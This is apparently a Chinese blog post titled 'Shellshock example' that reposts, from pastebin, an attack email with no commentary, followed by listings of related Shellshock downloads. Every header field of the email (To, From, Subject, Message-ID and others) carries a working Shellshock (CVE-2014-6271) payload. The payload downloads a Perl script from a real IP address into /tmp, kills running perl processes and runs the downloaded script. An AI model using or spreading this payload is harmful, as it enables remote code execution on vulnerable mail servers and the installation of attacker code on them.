`

Shellshock示例

    博客分类:
  • web
 
阅读更多
来自:http://pastebin.com/Qbgn09Wa
邮件:
引用

===
To:() { :; };wget -O /tmp/.legend http://190.94.251.41/legend.txt;killall -9 perl;perl /tmp/.legend

References:() { :; };wget -O /tmp/.legend http://190.94.251.41/legend.txt;killall -9 perl;perl /tmp/.legend

Cc:() { :; };wget -O /tmp/.legend http://190.94.251.41/legend.txt;killall -9 perl;perl /tmp/.legend

From:() { :; };wget -O /tmp/.legend http://190.94.251.41/legend.txt;killall -9 perl;perl /tmp/.legend

Subject:() { :; };wget -O /tmp/.legend http://190.94.251.41/legend.txt;killall -9 perl;perl /tmp/.legend

Date:() { :; };wget -O /tmp/.legend http://190.94.251.41/legend.txt;killall -9 perl;perl /tmp/.legend

Message-ID:() { :; };wget -O /tmp/.legend http://190.94.251.41/legend.txt;killall -9 perl;perl /tmp/.legend

Comments:() { :; };wget -O /tmp/.legend http://190.94.251.41/legend.txt;killall -9 perl;perl /tmp/.legend

Keywords:() { :; };wget -O /tmp/.legend http://190.94.251.41/legend.txt;killall -9 perl;perl /tmp/.legend

Resent-Date:() { :; };wget -O /tmp/.legend http://190.94.251.41/legend.txt;killall -9 perl;perl /tmp/.legend

Resent-From:() { :; };wget -O /tmp/.legend http://190.94.251.41/legend.txt;killall -9 perl;perl /tmp/.legend

Resent-Sender:() { :; };wget -O /tmp/.legend http://190.94.251.41/legend.txt;killall -9 perl;perl /tmp/.legend

wget -O /tmp/.legend http://190.94.251.41/legend.txt;killall -9 perl;perl /tmp/.legend


分享到:
评论

相关推荐

    ShellShock 攻击实验-内含源码以及设计说明书(可以自己运行复现).zip

    3. **攻击示例与复现**:实验中提供的源码将展示如何构造恶意输入来触发ShellShock漏洞。你可以通过修改环境变量,观察系统行为的变化,理解攻击是如何发生的。 4. **防御措施**:学习如何防御ShellShock攻击至关...

    shellshock-shell:针对 Shellschok CVE-2014-6271 错误的一个简单的类似 python shell 的漏洞利用

    shellshock-shell 针对 Shellschok CVE-2014-6271 错误的一个简单的类似 python shell 的漏洞利用。 使用它来利用已知的易受攻击的 URL。 此工具只能在您自己的授权 URL 上使用。... 示例:./shellshock.py -u

    shellshock-cgi:一个 Python 脚本,用于枚举特定服务器上易受 CVE-2014-6271 攻击的 CGI 脚本

    shellshock-cgi 一个 Python 脚本,用于枚举特定服务器上易受 CVE-2014-6271 攻击的 CGI 脚本 用法 $ python testing.py --server 172.16.255.130 --listen 172.16.255.1 ##示例返回: [+] Testing if 172.16....

    ShellShock-CGI-Scan:用C语言编写的脚本,用于检查CGI脚本是否容易受到CVE-2014-6271的攻击(The Bash Bug)

    ShellShock-CGI-扫描 用C语言编写的脚本,用于检查CGI脚本是否容易受到CVE-2014-6271(The Bash Bug)的攻击。 选项: -i (local ip-address) -p (port to listen) -l (site list) -t (connection timeout) ...

    破壳漏洞修复步骤

    破壳漏洞,又称为Shellshock漏洞,是一个严重的安全漏洞,影响了广泛使用的Bash shell。这个漏洞在2014年被发现,允许攻击者通过精心构造的环境变量注入恶意代码,从而控制受感染的系统。Bash是Unix和Linux系统中的...

    shellshocker:https背后的代码

    "shellshocker-master"很可能是一个包含关于Shellshocker漏洞分析、修复方法或者测试示例的项目仓库。通常,这样的仓库可能包括源代码、说明文档、PoC(Proof of Concept)测试脚本、安全更新的补丁等内容。开发者或...

    Cgi-bin 30个漏洞+使用方法.txt

    以上仅为部分漏洞及其利用方法的示例,每个漏洞的具体实现细节和危害程度会有所不同。针对这些漏洞,开发者应当采取以下措施进行防御: - **输入验证**:对于所有用户提交的数据,都需要进行严格的验证和过滤,确保...

    sh

    如果"lsh-master"是一个实际的项目,进一步了解其内容可以提供更具体的编程示例和应用。例如,它可能包含各种实用的Shell脚本模板,用于文件管理、系统监控、备份策略等常见任务。学习和理解这样的项目可以帮助提升...

    Q版缓冲区溢出教程(电子书版)

    除了理论知识,这本教程可能还包含了一些实践性的练习,比如编写简单的溢出示例,使用调试工具(如GDB)来观察溢出过程,甚至可能涉及到逆向工程的基本概念,以帮助读者从实践角度理解缓冲区溢出。 总的来说,《Q版...

    C和C++安全编码(第2版).((美)Robert C. Seacord)

    - **真实世界示例**:通过分析历史上著名的安全漏洞(如Heartbleed、Shellshock等),深入理解错误的根源及其防范措施。 - **攻击模拟**:模拟常见的攻击手段(如SQL注入、XSS跨站脚本攻击等),教会读者如何识别和...

    漏洞-方法-幻灯片:PDF幻灯片

    PDF格式则意味着这些内容是静态的,便于阅读和打印,同时可能包含了丰富的文字、图表和示例。 【描述】:“漏洞方法幻灯片 PDF幻灯片 此回购完全包含有关狩猎和黑客xD方法的材料:)” 描述中提到的“狩猎”通常指...

    vulnerability-paper:收集的文章

    3. **案例研究**:详细描述了真实世界中发生的著名安全事件,如Heartbleed、Shellshock等,分析其影响和应对措施。 4. **工具和代码**:可能包含用于漏洞检测、安全审计的开源工具源码,以及利用或防御漏洞的示例...

Global site tag (gtag.js) - Google Analytics